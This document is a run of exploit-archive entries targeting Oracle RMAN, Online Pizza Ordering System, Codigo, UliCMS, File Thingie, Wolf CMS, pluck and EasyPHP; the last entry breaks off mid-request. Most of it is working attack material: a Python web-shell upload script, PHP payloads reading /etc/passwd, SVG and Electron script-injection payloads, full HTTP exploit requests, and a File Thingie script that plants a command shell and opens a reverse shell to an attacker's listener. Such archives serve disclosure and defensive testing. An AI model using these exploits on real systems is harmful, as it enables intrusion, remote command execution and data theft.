<pre><code>Title: CVE-2020-2978 - Oracle RMAN Audit table point in time recovery not recorded<br />Product: Database<br />Manufacturer: Oracle<br />Affected Version(s): 12.1.0.2, 12.2.0.1, 18c, 19c<br />Tested Version(s): 19c<br />Risk Level: Medium<br />Score: 4.1<br />Solution Status: Fixed<br />CVE Reference: CVE-2020-2978<br />Author of Advisory: Emad Al-Mousa<br /><br />Overview:<br /><br />Audit failure is a security weakness in software product especially if a security audit is in-place to detect a certain operation. Oracle RMAN is<br />a database Recovery Manager utility for backup and restore operations, so any security weakness/vulnerability can be exploited by insider threat or<br />external attacker to view confidential data in unauthorized manner.<br /><br />*****************************************<br />Vulnerability Details:<br /><br />The scope of this security research is to detect if a database administrator tried to restore a "sensitive table" (already in-place auditing is configured against SELECT statements against this sensitive table). <br />The following research illustrates that despite RMAN operations are audited by “default” in pure “Unified Auditing” mode, the table point of time recovery activity/action was not logged in the audit logs. <br />As a result, any trails for future forensic investigation or real time security operations monitoring for activities against highly confidential sensitive table will not be met.<br /><br /><br />*****************************************<br />Proof of Concept (PoC):<br /><br />// I will check first if Unified Auditing feature is enabled in an Oracle database system:<br /><br />SQL> select value from v$option where parameter ='Unified Auditing';<br /> <br />VALUE<br />----------------------------------------------------------------<br />TRUE<br /> <br /> <br />SQL> select * from DBA_AUDIT_MGMT_CONFIG_PARAMS where PARAMETER_NAME = 'AUDIT WRITE MODE';<br /> <br />PARAMETER_NAME<br />------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br />PARAMETER_VALUE<br />------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br />AUDIT_TRAIL<br />----------------------------<br />AUDIT WRITE MODE<br />IMMEDIATE WRITE MODE<br />UNIFIED AUDIT TRAIL<br /><br /><br />// I will create linux shell script to restore a sensitive database table with different name , you will need to access the Linux OS as DBA linux account<br />for the exploit to work ....the sensitive table is called "dummy" under schema called "DBA" and the attacker will restore it with different name ---><br />dummy_55:<br /> <br />touch /tmp/dbtest/resotre.sh<br /><br />chmod 700 /tmp/dbtest/resotre.sh<br /><br />vi /tmp/dbtest/resotre.sh<br /> <br />#!/bin/sh<br />export ORACLE_SID=dbtest<br />export ORACLE_HOME=/orcl/dbtest/product/18.3<br />export RMAN_LOG_FILE=/tmp/dbtest/aux_db/db_restore.log<br />RMAN=$ORACLE_HOME/bin/rman<br />CMD_STR="<br />ORACLE_HOME=$ORACLE_HOME<br />export ORACLE_HOME<br />ORACLE_SID=$ORACLE_SID<br />export ORACLE_SID<br />$RMAN target \/ msglog $RMAN_LOG_FILE append << EOF<br />connect CATALOG $RCVCAT_CONNECT_STR<br />run {<br />recover table dba.dummy<br />#until scn 56330407409<br />until time \"to_date('23-JAN-2020 08:00:00','DD-MON-YYYY HH24:MI:SS')\"<br />auxiliary destination '/tmp/dbtest/aux_db'<br />remap table dba.dummy:dummy_55;<br />}<br />EOF<br />"<br />/usr/bin/sh -c "$CMD_STR" >> $RMAN_LOG_FILE<br /><br />// then run the shell script:<br /><br />/tmp/dbtest/resotre.sh<br /> <br /> <br />// Log File /tmp/dbtest/aux_db/db_restore.log shows the restore is successful:<br /> <br />auxiliary instance file /tmp/dbtest/aux_db/JTVB_PITR_dbtest/onlinelog/o1_mf_1_h2lopldq_.log deleted<br />auxiliary instance file /tmp/dbtest/aux_db/JTVB_PITR_dbtest/datafile/o1_mf_ts_user__h2locvjr_.dbf deleted<br />auxiliary instance file /tmp/dbtest/aux_db/dbtest/datafile/o1_mf_sysaux_h2lncb1c_.dbf deleted<br />auxiliary instance file /tmp/dbtest/aux_db/dbtest/datafile/o1_mf_ts_undo__h2lnlrw7_.dbf deleted<br />auxiliary instance file /tmp/dbtest/aux_db/dbtest/datafile/o1_mf_system_h2lncb14_.dbf deleted<br />auxiliary instance file /tmp/dbtest/aux_db/dbtest/datafile/o1_mf_system_h2lncbvp_.dbf deleted<br />auxiliary instance file /tmp/dbtest/aux_db/dbtest/controlfile/o1_mf_h2ln7ftc_.ctl deleted<br />auxiliary instance file tspitr_jtvb_19868.dmp deleted<br />Finished recover at 01/23/2020-11:19:30<br /> <br />RMAN> RMAN><br /> <br />Recovery Manager complete. <br /><br /><br />// you can now access the sensitive table and query data:<br /><br />sqlplus / as sysdba<br /><br />SQL> select * from dba.dummy_55;<br /><br />// Checking the unified audit trail:<br /> <br />SQL> select EVENT_TIMESTAMP, ACTION_NAME, RMAN_SESSION_STAMP, RMAN_OPERATION,RMAN_OPERATION,RMAN_OBJECT_TYPE<br />from unified_audit_trail where ACTION_NAME like '%RMAN%' order by 1;<br /> <br />The RMAN session is logged in the audit table, but there is NO details of what kind of RMAN operation took place ?!<br /><br />Conclusion:<br /><br />SystemAdmin/Attacker can view sensitive data without being audited which will impact forensic investigation, and threat detection.<br /><br /><br /><br />*****************************************<br />References:<br />https://www.oracle.com/security-alerts/cpujul2020.html<br />https://nvd.nist.gov/vuln/detail/CVE-2020-2978<br />https://databasesecurityninja.wordpress.com/2020/12/01/cve-2020-2978-rman-audit-table-point-in-time-recovery-not-logged/<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Online Pizza Ordering System 1.0 - Unauthenticated File Upload<br /># Date: 03/05/2023<br /># Exploit Author: URGAN <br /># Vendor Homepage: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip<br /># Version: v1.0<br /># Tested on: LAMP Fedora Server 27 (Twenty Seven) Apache/2.4.34 (Fedora) 10.2.19-MariaDB PHP 7.1.23 <br /># CVE: CVE-2023-2246<br /><br />#!/usr/bin/env python3<br /># coding: utf-8<br /><br />import os<br />import requests<br />import argparse<br />from bs4 import BeautifulSoup<br /><br /># command line arguments<br />parser = argparse.ArgumentParser()<br />parser.add_argument('-u', '--url', type=str, help='URL with http://')<br />parser.add_argument('-p', '--payload', type=str, help='PHP webshell')<br />args = parser.parse_args()<br /><br /># if no arguments are passed, ask the user for them<br />if not (args.url and args.payload):<br /> args.url = input('Enter URL with http://: ')<br /> args.payload = input('Enter file path PHP webshell: ')<br /><br /># URL Variables<br />url = args.url + '/admin/ajax.php?action=save_settings'<br />img_url = args.url + '/assets/img/'<br /><br />filename = os.path.basename(args.payload)<br /><br />files = [<br /> ('img',(filename,open(args.payload,'rb'),'application/octet-stream'))<br />]<br /><br /># send a POST request to the server<br />resp_upl = requests.post(url, files = files)<br />status_code = resp_upl.status_code<br />if status_code == 200:<br /> print('[+] File uploaded')<br />else:<br /> print(f'[-] Error {status_code}: {resp_upl.text}')<br /> raise SystemExit(f'[-] Script stopped due to error {status_code}.')<br /><br /># send a GET request to the server<br />resp_find = requests.get(img_url)<br /><br /># Use BeautifulSoup to parse the page's HTML code<br />soup = BeautifulSoup(resp_find.text, 'html.parser')<br /><br /># get all <a> tags on a page<br />links = soup.find_all('a')<br /><br /># list to store found files<br />found_files = []<br /><br /># we go through all the links and look for the desired file by its name<br />for link in links:<br /> file_upl = link.get('href')<br /> if file_upl.endswith(filename): # uploaded file name<br /> print('[+] Uploaded file found:', file_upl)<br /> file_url = img_url + file_upl # get the full URL of your file<br /> found_files.append(file_url) # add the file to the list of found files<br /><br /># if the list is not empty, then display all found files<br />if found_files:<br /> print('[+] Full URL of your file:')<br /> for file_url in found_files:<br /> print('[+] ' + file_url)<br />else:<br /> print('[-] File not found')<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Codigo Markdown Editor v1.0.1 (Electron) - Arbitrary Code Execution<br /># Date: 2023-05-03<br /># Exploit Author: 8bitsec<br /># Vendor Homepage: https://alfonzm.github.io/codigo/<br /># Software Link: https://github.com/alfonzm/codigo-app<br /># Version: 1.0.1<br /># Tested on: [Mac OS 13]<br /><br />Release Date:<br />=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br />2023-05-03<br /><br />Product & Service Introduction:<br />=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=<br />=3D=3D=3D=3D=3D=3D<br />A Markdown editor & notes app made with Vue & Electron<br /><br />Technical Details & Description:<br />=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=<br />=3D=3D=3D=3D=3D=3D=3D<br /><br />A vulnerability was discovered on Codigo markdown editor v1.0.1 allowing a =<br />user to execute arbitrary code by opening a specially crafted file.<br /><br />Proof of Concept (PoC):<br />=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br /><br />Arbitrary code execution:<br /><br />Create a markdown file (.md) in any text editor and write the following pay=<br />load:<br /><video><source onerror=3D"alert(require('child_process').execSync('/System/=<br />Applications/Calculator.app/Contents/MacOS/Calculator').toString());"><br /><br />Opening the file in Codigo will auto execute the Calculator application.<br /><br /></code></pre>
<pre><code>#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)<br />#Application: Ulicms<br />#Version: 2023.1-sniffing-vicuna<br />#Bugs: RCE<br />#Technology: PHP<br />#Vendor URL: https://en.ulicms.de/<br />#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip<br />#Date of found: 04-05-2023<br />#Author: Mirabbas Ağalarov<br />#Tested on: Linux <br /><br />2. Technical Details & POC<br />========================================<br />steps: <br /><br />1. Login to account and edit profile.<br /><br />2.Upload new Avatar<br /><br />3. It is possible to include the php file with the phar extension when uploading the image. Rce is triggered when we visit it again. File upload error may occur, but this does not mean that the file is not uploaded and the file location is shown in the error<br /><br />payload: <?php echo system("cat /etc/passwd"); ?><br /><br />poc request :<br /><br />POST /dist/admin/index.php HTTP/1.1<br />Host: localhost<br />Content-Length: 1982<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/dist/admin/index.php?action=admin_edit&id=12&ref=home<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv<br />Connection: close<br /><br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="csrf_token"<br /><br />e2d428bc0585c06c651ca8b51b72fa58<br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="sClass"<br /><br />UserController<br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="sMethod"<br /><br />update<br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="avatar"; filename="salam.phar"<br />Content-Type: application/octet-stream<br /><br /><?php echo system("cat /etc/passwd"); ?><br /><br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="edit_admin"<br /><br />edit_admin<br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="id"<br /><br />12<br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="firstname"<br /><br />account1<br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="lastname"<br /><br />account1<br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="email"<br /><br />account1@test.com<br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="password"<br /><br /><br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="password_repeat"<br /><br /><br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="group_id"<br /><br />1<br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="secondary_groups[]"<br /><br />1<br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="homepage"<br /><br /><br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="html_editor"<br /><br />ckeditor<br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="admin"<br /><br />1<br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="default_language"<br /><br /><br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy<br />Content-Disposition: form-data; name="about_me"<br /><br /><br />------WebKitFormBoundaryYB7QS1BMMo1CXZVy--<br /><br /><br /><br />response:<br /><br />Error<br />GmagickException: No decode delegate for this image format (/var/www/html/dist/content/tmp/645364e62615b.phar) in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:67<br />Stack trace:<br />#0 /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php(67): Gmagick->__construct()<br />#1 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()<br />#2 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()<br />#3 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()<br />#4 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()<br />#5 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()<br />#6 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()<br />#7 {main}<br /><br />Next Imagine\Exception\RuntimeException: Unable to open image /var/www/html/dist/content/tmp/645364e62615b.phar in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:73<br />Stack trace:<br />#0 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()<br />#1 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()<br />#2 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()<br />#3 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()<br />#4 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()<br />#5 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()<br />#6 {main}<br /><br /><br />4. Go to /var/www/html/dist/content/tmp/645364e62615b.phar (http://localhost/dist/content/tmp/645364e62615b.phar)<br /> <br /><br /><br /></code></pre>
<pre><code>#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)<br />#Application: Ulicms<br />#Version: 2023.1-sniffing-vicuna<br />#Bugs: Stored Xss<br />#Technology: PHP<br />#Vendor URL: https://en.ulicms.de/<br />#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip<br />#Date of found: 04-05-2023<br />#Author: Mirabbas Ağalarov<br />#Tested on: Linux <br /><br />2. Technical Details & POC<br />========================================<br />steps: <br /><br />1. Go to media then to file (http://localhost/dist/admin/index.php?action=files)<br />2. upload malicious svg file<br /><br />svg file content ===><br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br /><br /><br />poc request:<br /><br />POST /dist/admin/fm/upload.php HTTP/1.1<br />Host: localhost<br />Content-Length: 663<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />Accept: application/json, text/javascript, */*; q=0.01<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryK3CvcSs8xZwzABCl<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />sec-ch-ua-platform: "Linux"<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/dist/admin/fm/dialog.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: last_position=%2F; 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv<br />Connection: close<br /><br />------WebKitFormBoundaryK3CvcSs8xZwzABCl<br />Content-Disposition: form-data; name="fldr"<br /><br /><br />------WebKitFormBoundaryK3CvcSs8xZwzABCl<br />Content-Disposition: form-data; name="files[]"; filename="SVG_XSS.svg"<br />Content-Type: image/svg+xml<br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br />------WebKitFormBoundaryK3CvcSs8xZwzABCl--<br /><br /><br /><br />3. Go to http://localhost/dist/content/SVG_XSS.svg<br /><br /></code></pre>
<pre><code>#!/usr/bin/python<br /><br /># Exploit Title: File Thingie 2.5.7 - Remote Code Execution (RCE)<br /># Google Dork: N/A<br /># Date: 27th of April, 2023<br /># Exploit Author: Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)<br /># Software Link: https://github.com/leefish/filethingie<br /># Version: 2.5.7<br /># Tested on: N/A<br /># CVE: N/A<br /><br /># Vulnerability originally discovered / published by Cakes<br /># Reference: https://www.exploit-db.com/exploits/47349<br /># Run a local listener on your machine and youre good to go<br /><br /><br />import os<br />import argparse<br />import requests<br />import random<br />import string<br />import zipfile<br />from urllib.parse import urlsplit, urlunsplit, quote<br /><br /><br />class Exploit:<br /> def __init__(self, target, username, password, lhost, lport):<br /> self.target = target<br /> self.username = username<br /> self.password = password<br /> self.lhost = lhost<br /> self.lport = lport<br /><br /> def try_login(self) -> bool:<br /> self.session = requests.Session()<br /><br /> post_body = {"ft_user": f"{self.username}", "ft_pass": f"{self.password}", "act": "dologin"}<br /> response = self.session.post(self.target, data=post_body)<br /><br /> if response.status_code == 404:<br /> print(f"[-] 404 Not Found - The requested resource {self.target} was not found")<br /> return False<br /><br /> elif response.status_code == 200:<br /><br /> if "Invalid username or password" in response.text:<br /> print(f"Invalid username or password")<br /> return False<br /><br /> return True<br /> <br /> def create_new_folder(self) -> bool:<br /> # Generate random string<br /> letters = string.ascii_letters<br /> self.payload_filename = "".join(random.choice(letters) for i in range(16))<br /> headers = {"Content-Type": "application/x-www-form-urlencoded"}<br /> post_body = {f"type": "folder", "newdir": f"{self.payload_filename}", "act": "createdir", "dir": "", "submit" :"Ok"}<br /><br /> print(f"[*] Creating new folder /{self.payload_filename}")<br /> response = self.session.post(self.target, headers=headers, data=post_body)<br /><br /> if f"index.php?dir=/{self.payload_filename}" in response.text:<br /> print(f"[+] Created new folder /{self.payload_filename}")<br /> return True<br /> <br /> else:<br /> print(f"[-] Could not create new folder /{self.payload_filename}")<br /> return False<br /><br /> def create_payload(self) -> bool:<br /> try:<br /> with zipfile.ZipFile(f"{self.payload_filename}.zip", 'w', compression=zipfile.ZIP_DEFLATED) as zip_file:<br /> zip_file.writestr(f"{self.payload_filename}.php", "<?php if(isset($_REQUEST[\'cmd\'])){ echo \"<pre>\"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo \"</pre>\"; die; }?>")<br /> print(f"[+] Zipped payload to {self.payload_filename}.zip")<br /> return True<br /> except:<br /> print(f"[-] Could not create payload to {self.payload_filename}.zip")<br /> return False<br /><br /> def upload_payload(self) -> bool:<br /> # Set up the HTTP headers and data for the request<br /> headers = {<br /> b'Content-Type': b'multipart/form-data; boundary=---------------------------grimlockx'<br /> }<br /><br /> post_body = (<br /> '-----------------------------grimlockx\r\n'<br /> 'Content-Disposition: form-data; name="localfile-1682513975953"; filename=""\r\n'<br /> 'Content-Type: application/octet-stream\r\n\r\n'<br /> )<br /><br /> post_body += (<br /> '\r\n-----------------------------grimlockx\r\n'<br /> 'Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n'<br /> '2000000\r\n'<br /> '-----------------------------grimlockx\r\n'<br /> f'Content-Disposition: form-data; name="localfile"; filename="{self.payload_filename}.zip"\r\n'<br /> 'Content-Type: application/zip\r\n\r\n'<br /> )<br /><br /> # Read the zip file contents and append them to the data<br /> with open(f"{self.payload_filename}.zip", "rb") as f:<br /> post_body += ''.join(map(chr, f.read()))<br /><br /> post_body += (<br /> '\r\n-----------------------------grimlockx\r\n'<br /> 'Content-Disposition: form-data; name="act"\r\n\r\n'<br /> 'upload\r\n'<br /> '-----------------------------grimlockx\r\n'<br /> 'Content-Disposition: form-data; name="dir"\r\n\r\n'<br /> f'/{self.payload_filename}\r\n'<br /> '-----------------------------grimlockx\r\n'<br /> 'Content-Disposition: form-data; name="submit"\r\n\r\n'<br /> 'Upload\r\n'<br /> '-----------------------------grimlockx--\r\n'<br /> )<br /><br /> print("[*] Uploading payload to the target")<br /><br /> response = self.session.post(self.target, headers=headers, data=post_body)<br /><br /> if f"<a href=\"./{self.payload_filename}/{self.payload_filename}.zip\" title=\"Show {self.payload_filename}.zip\">{self.payload_filename}.zip</a>" in response.text:<br /> print("[+] Uploading payload successful")<br /> return True<br /><br /> else: <br /> print("[-] Uploading payload failed")<br /> return False<br /> <br /> def get_base_url(self) -> str:<br /> url_parts = urlsplit(self.target)<br /> path_parts = url_parts.path.split('/')<br /> path_parts.pop()<br /> base_url = urlunsplit((url_parts.scheme, url_parts.netloc, '/'.join(path_parts), "", ""))<br /> return base_url<br /><br /> def unzip_payload(self) -> bool:<br /> print("[*] Unzipping payload")<br /> headers = {"Content-Type": "application/x-www-form-urlencoded"}<br /> post_body = {"newvalue": f"{self.payload_filename}.zip", "file": f"{self.payload_filename}.zip", "dir": f"/{self.payload_filename}", "act": "unzip"}<br /> response = self.session.post(f"{self.target}", headers=headers, data=post_body)<br /> <br /> if f"<p class='ok'>{self.payload_filename}.zip unzipped.</p>" in response.text:<br /> print("[+] Unzipping payload successful")<br /> print(f"[+] You can now execute commands by opening {self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd=<command>")<br /> return True<br /><br /> else: <br /> print("[-] Unzipping payload failed")<br /> return False<br /><br /> def execute_payload(self) -> bool:<br /> print("[*] Trying the get a reverse shell")<br /><br /> cmd = quote(f"php -r \'$sock=fsockopen(\"{self.lhost}\",{self.lport});system(\"/bin/bash <&3 >&3 2>&3\");\'")<br /> print("[*] Executing payload")<br /><br /> response = self.session.get(f"{self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd={cmd}")<br /> print("[+] Exploit complete")<br /> <br /> return True<br /><br /> def cleanup_local_files(self) -> bool:<br /> if os.path.exists(f"{self.payload_filename}.zip"):<br /> os.remove(f"{self.payload_filename}.zip")<br /> print("[+] Cleaned up zipped payload on local machine")<br /> return True<br /> <br /> print("[-] Could not clean up zipped payload on local machine")<br /> return False<br /><br /><br />if __name__ == "__main__":<br /> parser = argparse.ArgumentParser()<br /> parser.add_argument("-t", "--target", dest="target", type=str, required=True, help="Target URL to ft2.php")<br /> parser.add_argument("-u", "--username", dest="username", type=str, required=True, help="FileThingie username")<br /> parser.add_argument("-p", "--password", dest="password", type=str, required=True, help="FileThingie password")<br /> parser.add_argument("-L", "--LHOST", dest="lhost", type=str, required=True, help="Local listener ip")<br /> parser.add_argument("-P", "-LPORT", dest="lport", type=int, required=True, help="Local listener port")<br /> args = parser.parse_args()<br /><br /> exploit = Exploit(args.target, args.username, args.password, args.lhost, args.lport)<br /> exploit.try_login()<br /> exploit.create_new_folder()<br /> exploit.create_payload()<br /> exploit.upload_payload()<br /> exploit.unzip_payload()<br /> exploit.execute_payload()<br /> exploit.cleanup_local_files()<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)<br /># Date: 2023-05-02<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor Homepage: https://wolf-cms.readthedocs.io<br /># Software Link: https://github.com/wolfcms/wolfcms<br /># Version: 0.8.3.1<br /># Tested on: Kali Linux<br /><br />### Steps to Reproduce ###<br /><br /># Firstly, go to the "Files" tab.<br /># Click on the "Create new file" button and create a php file (e.g:<br />shell.php)<br /># Then, click on the file you created to edit it.<br /># Now, enter your shell code and save the file.<br /># Finally, go to https://localhost/wolfcms/public/shell.php<br /><br />### There's your shell! ###<br /><br /></code></pre>
<pre><code>Exploit Title: pluck v4.7.18 - Stored Cross-Site Scripting (XSS)<br />Application: pluck<br />Version: 4.7.18<br />Bugs: XSS<br />Technology: PHP<br />Vendor URL: https://github.com/pluck-cms/pluck<br />Software Link: https://github.com/pluck-cms/pluck<br />Date of found: 01-05-2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />steps: <br /><br />1. create .svg file.<br />2. svg file content:<br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br /><br />3. upload file (http://localhost/pluck-4.7.18/admin.php?action=files)<br /><br />poc request<br /><br /><br />POST /pluck-4.7.18/admin.php?action=files HTTP/1.1<br />Host: localhost<br />Content-Length: 672<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJMTiFxESCx7aNqmI<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/pluck-4.7.18/admin.php?action=files<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=s34g5lr0qg5m4qh0ph5plmo8de<br />Connection: close<br /><br />------WebKitFormBoundaryJMTiFxESCx7aNqmI<br />Content-Disposition: form-data; name="filefile"; filename="SVG_XSS.svg"<br />Content-Type: image/svg+xml<br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br />------WebKitFormBoundaryJMTiFxESCx7aNqmI<br />Content-Disposition: form-data; name="submit"<br /><br />Upload<br />------WebKitFormBoundaryJMTiFxESCx7aNqmI--<br /><br /><br /><br />4. go to http://localhost/pluck-4.7.18/files/svg_xss.svg<br /><br /></code></pre>
<pre><code># Exploit Title: EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and<br />Path Traversal)<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2022-02-06<br /># Vendor Homepage: https://www.easyphp.org/<br /># Software Link : https://www.easyphp.org/<br /># Tested Version: 14.1<br /># Tested on: Windows 7 and 10<br /><br /># Vulnerability Type: Remote Command Execution (RCE)<br /><br />CVSS v3: 9.8<br />CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br />CWE: CWE-78<br /><br />Vulnerability description: There is an OS Command Injection in EasyPHP<br />Webserver 14.1 that allows an attacker to achieve Remote Code Execution<br />(RCE) with administrative privileges.<br /><br />Proof of concept:<br /><br />To detect:<br /><br />POST http://127.0.0.1:10000/index.php?zone=settings HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)<br />Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: 